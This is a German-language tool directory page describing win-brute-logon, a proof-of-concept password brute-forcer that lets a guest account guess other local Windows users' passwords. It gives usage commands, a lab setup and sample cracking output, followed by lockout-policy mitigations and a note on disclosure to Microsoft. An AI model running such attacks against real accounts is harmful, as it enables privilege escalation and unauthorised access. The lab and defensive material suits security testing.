Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
win-brute-logon — Knacken Sie jedes Microsoft Windows-Benutzerpasswort ohne jegliche Berechtigung (Gastkonto eingeschlossen) | Kitploit
Tools/GitHubGitHub/darkcodersc/win-brute-logon
Passwort-CrackingPrivilege EscalationPasswortangriffeExploitationPenetrationstests
GitHubdarkcodersc/win-brute-logon

win-brute-logon

Knacken Sie jedes Microsoft Windows-Benutzerpasswort ohne jegliche Berechtigung (Gastkonto eingeschlossen)

Repository anzeigen
1.2k187vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Hinweis 1: Wir freuen uns, bekannt geben zu können, dass unser aktuelles Tool in eine PowerShell-Version portiert wurde. Dies bedeutet, dass Benutzer das Tool nun direkt über die PowerShell-Befehlszeile aufrufen und verwenden können, was die Nutzung noch bequemer und effizienter macht. Wir sind überzeugt, dass diese neue Version unseren Benutzern großen Nutzen bringen und ihre Erfahrung mit dem Tool verbessern wird. Vielen Dank für Ihre anhaltende Unterstützung. Wir hoffen, Ihnen gefällt die neue PowerShell-Version: https://github.com/DarkCoderSc/power-brute-logon

Hinweis 2: Wir haben kürzlich erfahren, dass Microsoft die Kontosperrrichtlinie in modernen und aktuellen Windows-Versionen standardmäßig aktiviert hat. Diese Richtlinie trägt zur Systemsicherheit bei, indem ein Konto nach einer bestimmten Anzahl fehlgeschlagener Anmeldeversuche gesperrt wird. Obwohl diese Sicherheitsmaßnahme sinnvoll ist, macht sie den Proof-of-Concept (PoC) auf diesen Systemen ineffizient.

Win Brute Logon (Proof of Concept)

Veröffentlichungsdatum: 2020-05-14

Ziel: Windows XP bis aktuelle Windows 10 Version (1909)

Console

Schwachstellenort: LogonUserA, LogonUserW, CreateProcessWithLogonA, CreateProcessWithLogonW

Verwendung

Wortlistendatei

WinBruteLogon.exe -u <benutzername> -w <wortlistendatei>

Wortliste über Stdin

type <wortlistendatei> | WinBruteLogon.exe -u <benutzername> -

Einführung

Win Brute Logon wurde entwickelt, um einen Brute-Force-Angriff auf ein Microsoft-Konto zu simulieren, indem in kurzer Zeit eine große Anzahl von Passwortkombinationen erraten wird. Auf diese Weise können Pentester die Sicherheitslage ihrer Systeme testen und deren Abwehr gegen Brute-Force-Angriffe bewerten. Das Tool nutzt das Fehlen eines Kontosperrmechanismus aus, eine häufige Schwachstelle in vielen Systemen (bevor die Kontosperrung standardmäßig unter Windows 11 aktiviert wurde). Durch das Erraten des Passworts eines Kontos kann das Tool Pentestern helfen, Schwachstellen in ihren Sicherheitsmaßnahmen zu identifizieren und zu beheben. Es sollte verantwortungsvoll und im Rahmen der gesetzlichen Bestimmungen eingesetzt werden.

PoC-Testszenario (mit einem Gastkonto)

Für diese Demonstration richten wir eine frische Version von Windows 10 auf einer virtuellen oder physischen Maschine ein. Nachdem die Maschine eingerichtet ist, melden Sie sich als Administrator an. Erstellen Sie dann zwei verschiedene lokale Konten: ein Administratorkonto und ein reguläres Benutzerkonto. Bitte beachten Sie, dass dieser Proof-of-Concept (PoC) zwar für die Demo mit dem Gastkonto durchgeführt wird, aber nicht auf das Gastkonto beschränkt ist. Er kann von jedem Konto oder jeder Gruppe aus verwendet werden, einschließlich Gast, regulärem Benutzer und Admin-Benutzer.

Neues Admin-Konto erstellen

net user darkcodersc /add

net user darkcodersc trousers (trousers ist das Passwort)

net localgroup administrators darkcodersc /add

Reguläres Benutzerkonto erstellen

net user HackMe /add

net user HackMe ozlq6qwm (ozlq6qwm ist das Passwort)

Neues Gastkonto erstellen

net user GuestUser /add

net localgroup users GuestUser /delete

net localgroup guests GuestUser /add

Wortliste besorgen

In meinem Fall sind sowohl trousers als auch ozlq6qwm in SecList enthalten: https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt

Angriff starten

Melden Sie sich für die Demonstration vom Administratorkonto ab oder starten Sie die Maschine neu und melden Sie sich am Gastkonto an. Platzieren Sie dann die PoC-Ausführungsdatei an einem Ort, auf den Sie als Gastbenutzer Zugriff haben.

Verwendung: WinBruteLogon.exe -v -u <benutzername> -w <wortlistendatei>

-v ist optional und steht für den ausführlichen Modus.

Standardmäßig ist der Domänenname der Wert der Umgebungsvariablen %USERDOMAIN%. Sie können mit der Option -d einen benutzerdefinierten Namen angeben.

Ersten Benutzer knacken: darkcodersc (Administrator)

prompt(guest)>WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt

Warten Sie einige Sekunden, um das folgende Ergebnis zu sehen:

root@kitploit:~
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=2260, handle=364
[INFO] New "TWorker" Thread created with id=3712, handle=532
[DONE] Done.
[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=2260, handle=364) Thread successfully terminated.
[INFO] "TWorkers"(id=3712, handle=532) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06

Zweiten Benutzer knacken: HackMe (Regulärer Benutzer)

prompt(guest)>WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt

Warten Sie einige Sekunden, um das folgende Ergebnis zu sehen:

root@kitploit:~
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=5748, handle=336
[INFO] New "TWorker" Thread created with id=4948, handle=140
[DONE] Done.
[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=5748, handle=336) Thread successfully terminated.
[INFO] "TWorkers"(id=4948, handle=140) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06

Praxisnahes Szenario

„In einem praxisnahen Szenario könnte ein Angreifer, der Zugriff auf ein Benutzerkonto mit niedrigen Rechten erlangt hat, das Passwort eines privilegierteren Benutzers knacken und seine Berechtigungen ausweiten. Um dieses Risiko zu mindern, können folgende Schritte unternommen werden:

  • Falls vorhanden, deaktivieren Sie alle Gastkonten.
  • Implementieren Sie eine Anwendungs-Whitelist, um die Ausführung nicht autorisierter Software einzuschränken.
  • Befolgen Sie die Richtlinien zum Erstellen und Verwalten sicherer Passwörter für alle Benutzer.

Um eine Sicherheitssperrrichtlinie zu implementieren (die standardmäßig nicht aktiviert ist), gehen Sie wie folgt vor:

  • Öffnen Sie das Hilfsprogramm 'secpol.msc'.
  • Navigieren Sie zu 'Kontorichtlinien' > 'Kontosperrungsrichtlinie'.
  • Bearbeiten Sie den Wert 'Kontosperrungsschwellenwert' mit einer gewünschten Anzahl von Versuchen (von 1 bis 999). Dieser Wert gibt die Anzahl fehlgeschlagener Anmeldeversuche an, bevor das Konto gesperrt wird.

Bitte beachten Sie, dass die Sperrrichtlinie nicht für das Administratorkonto gilt. In diesem Fall ist der beste Schutz für das Administratorkonto (falls aktiviert) die Einrichtung eines sehr komplexen Passworts.

Ein Bericht über diese Schwachstelle wurde an das Microsoft Security Team gesendet. Sie sollten erwägen, die Kontosperrrichtlinie standardmäßig zu aktivieren."

(UPDATE 2022): Kontosperrung endlich standardmäßig aktiviert.

Tool herunterladen